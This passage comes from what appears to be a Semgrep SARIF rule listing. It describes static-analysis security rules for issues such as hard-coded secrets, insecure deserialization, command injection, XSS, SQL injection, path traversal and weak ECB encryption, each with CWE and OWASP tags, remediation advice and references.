java.servlets.security.xxe.tainted-schemafactory-xxe-servlet.tainted-schemafactory-xxe-servlet"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","id":"rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","name":"rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.mongodb.hardcoded-connection-url.hardcoded-connection-url"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","id":"python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","name":"python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-pandas-pickle-pyramid.tainted-pandas-pickle-pyramid"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside exec.Cmd. Audit the input to 'exec.Cmd'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","id":"go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","name":"go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.dangerous-exec-cmd.dangerous-exec-cmd"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask)\n - [https://docs.paramiko.org/en/latest/api/client.html#paramiko.client.SSHClient.exec_command](https://docs.paramiko.org/en/latest/api/client.html#paramiko.client.SSHClient.exec_command)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","id":"python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","name":"python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-paramiko-flask.tainted-os-command-paramiko-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS."},"help":{"markdown":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message)\n - [https://www.damonkohler.com/2008/12/email-injection.html](https://www.damonkohler.com/2008/12/email-injection.html)\n","text":"Found request data in 'send_mail(...)' that uses 'html_message'. This is dangerous because HTML emails are susceptible to XSS. An attacker could inject data into this HTML email, causing XSS."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","id":"python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","name":"python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message","properties":{"precision":"very-high","tags":["CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.email.xss-send-mail-html-message.xss-send-mail-html-message"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlalchemy-flask.sqlalchemy-flask)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Use the SQLAlchemy ORM provided functions to build SQL queries instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlalchemy-flask.sqlalchemy-flask","id":"python.flask.db.sqlalchemy-flask.sqlalchemy-flask","name":"python.flask.db.sqlalchemy-flask.sqlalchemy-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlalchemy-flask.sqlalchemy-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Facebook OAuth detected"},"help":{"markdown":"Facebook OAuth detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Facebook OAuth detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","id":"generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","name":"generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-facebook-oauth.detected-facebook-oauth"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","id":"python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","name":"python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-pickleshare-fastapi.tainted-pickleshare-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. "},"help":{"markdown":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n - [https://crypto.stackexchange.com/questions/20941/why-shouldnt-i-use-ecb-encryption](https://crypto.stackexchange.com/questions/20941/why-shouldnt-i-use-ecb-encryption)\n - [https://medium.com/asecuritysite-when-bob-met-alice/surely-no-one-uses-ecb-mode-in-aes-332ed90f29d0](https://medium.com/asecuritysite-when-bob-met-alice/surely-no-one-uses-ecb-mode-in-aes-332ed90f29d0)\n","text":"Symmetric cryptographic operations were identified that use Electronic Code Book (ECB) mode. ECB mode is considered insecure as identical plaintext blocks encrypt to identical ciphertexts revealing patterns in the data. Use stronger, better alternatives such as AES-GCM or ChaChaPoly. "},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","id":"swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","name":"swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-crypto-ecb-mode.insecure-crypto-ecb-mode"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","id":"python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","name":"python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask.tainted-os-command-stdlib-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User controlled data in a HTML string may result in XSS"},"help":{"markdown":"User controlled data in a HTML string may result in XSS\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.browser.security.raw-html-concat.raw-html-concat)\n - [https://owasp.org/www-community/attacks/xss/](https://owasp.org/www-community/attacks/xss/)\n","text":"User controlled data in a HTML string may result in XSS"},"helpUri":"https://semgrep.dev/r/javascript.browser.security.raw-html-concat.raw-html-concat","id":"javascript.browser.security.raw-html-concat.raw-html-concat","name":"javascript.browser.security.raw-html-concat.raw-html-concat","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.browser.security.raw-html-concat.raw-html-concat"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","id":"python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","name":"python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.mysqlclient.python-mysqlclient-empty-password.python-mysqlclient-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request)\n - [https://github.com/parnurzeal/gorequest](https://github.com/parnurzeal/gorequest)\n","text":"Checks for requests to http (unencrypted) sites using gorequest, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.gorequest-http-request.gorequest-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html](https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html)\n","text":"Use of AES with no settings detected. By default, java.crypto.Cipher uses ECB mode. ECB doesn't provide message confidentiality and is not semantically secure so should not be used. Instead, use a strong, secure cipher: java.crypto.Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","id":"java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","name":"java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.use-of-default-aes.use-of-default-aes"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path."},"help":{"markdown":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal)\n - [https://www.owasp.org/index.php/Path_Traversal](https://www.owasp.org/index.php/Path_Traversal)\n","text":"Detected a potential path traversal. A malicious actor could control the location of this file, to include going backwards in the directory with '../'. To address this, ensure that user-controlled variables in file paths are sanitized. You may also consider using a utility method such as org.apache.commons.io.FilenameUtils.getName(...) to only retrieve the file name from the path."},"helpUri":"https://semgrep.dev/r/java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","id":"java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","name":"java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.httpservlet-path-traversal.httpservlet-path-traversal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-json-flask.tainted-json-flask)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://docs.python.org/3/library/json.html](https://docs.python.org/3/library/json.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. To prevent this vulnerability, leverage data formats such as JSON or XML as safer alternatives. If you need to deserialize user input in a specific format, consider digitally signing the data before serialization to prevent tampering. For more information, see: [Deserialization prevention](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html) Even for a data-only serialization format such as JSON, a malicious string may cause the decoder to consume considerable CPU and memory resources. Limiting the size of data to be parsed is recommended."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-json-flask.tainted-json-flask","id":"python.flask.deserialization.tainted-json-flask.tainted-json-flask","name":"python.flask.deserialization.tainted-json-flask.tainted-json-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.deserialization.tainted-json-flask.tainted-json-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"abi.encodePacked hash collision with variable length arguments in $F()"},"help":{"markdown":"abi.encodePacked hash collision with variable length arguments in $F()\n\nReferences:\n - [Semgrep 